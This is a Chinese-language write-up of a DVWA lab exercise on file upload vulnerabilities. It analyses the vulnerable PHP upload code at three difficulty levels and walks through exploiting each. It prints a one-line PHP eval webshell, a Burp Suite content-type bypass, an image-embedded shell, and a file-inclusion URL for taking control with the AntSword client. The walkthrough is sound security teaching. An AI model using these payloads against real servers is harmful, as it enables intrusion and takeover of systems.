一、文件上传漏洞
文件上传漏洞形成的主要原因是没有对上传的文件做好安全校验,导致攻击者可以越过本身的权限像服务器上传非法文件,如木马、病毒等。因此文件上传漏洞的危害是非常严重的。
二、DVWA靶场
这次的实验主要采用DVWA靶场,对dvwa靶场的三个级别进行测试
三、low级别
3.1.代码分析
代码可以确认,对上传的文件类型、文件内容没有做任何的检查过滤,存在很明显的文件上传漏洞,并且在上传成功后会对反馈对应信息。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
3.2 漏洞利用
- 文件上传漏洞利用条件”可以成功上传文件”、”文件可被执行”、”可以确认文件上传路径”,low级别下都是满足的
- 上传一句话木马,cmd文件
<?php @eval($_POST['cmd']);?>
3.文件上传成功,确认上传路径
- 使用蚁剑,右键确认添加数据
- 蚁剑会通过服务器发送包含cmd的port请求,获取webshell权限,可以进行文件上传下载更改权限等操作,并且可打开服务器的虚拟终端
四、Medium
4.1 代码分析
检查代码确认其对上传文件的类型和大小都做了限制,文件只允许”jpeg”和”png”类型,大小不超过100000B
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
4.2 漏洞利用
文件采用的是一句话木马,因此文件大小不成问题,对于文件类型的检查,可以通过burpsuite抓包进行更改
- 上传一句话木马,cmd文件
<?php @eval($_POST['cmd']);?>
- burpsuite抓包更改
- 上传成功,并且确认上传路径
- 使用蚁剑并成功
五、high
5.1 代码分析
getimagesize
(string_filename),该函数会通过读取文件头,图片长宽等信息,如没有图片相关的文件头则会报错,同时可以看到代码在读取文件的时候要求文件后缀必须是”jpg”、”jpeg”、”png”其中之一。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
5.2 漏洞利用
- 图片木马,因为代码中限制了图片格式,因此需要整一个图片木马,使用copy将图片文件和木马文件cmd.php合并,并且保证合成文件不大于100000B
- 文件上传成功确认路径
- 因为蚁剑是通过发送”cmd”参数的post请求,来达到控制目的,但是服务器已经把文件解析成了图片文件,因此无法解析需要利用dwva的另外一种漏洞–文件包含,蚁剑右键添加数据输入http://dvwa_ip/vulnerabilities/fi/?page=/var/www/html/hackable/uploads/hack.jpg,并且登录更改cookie,即可上传成功。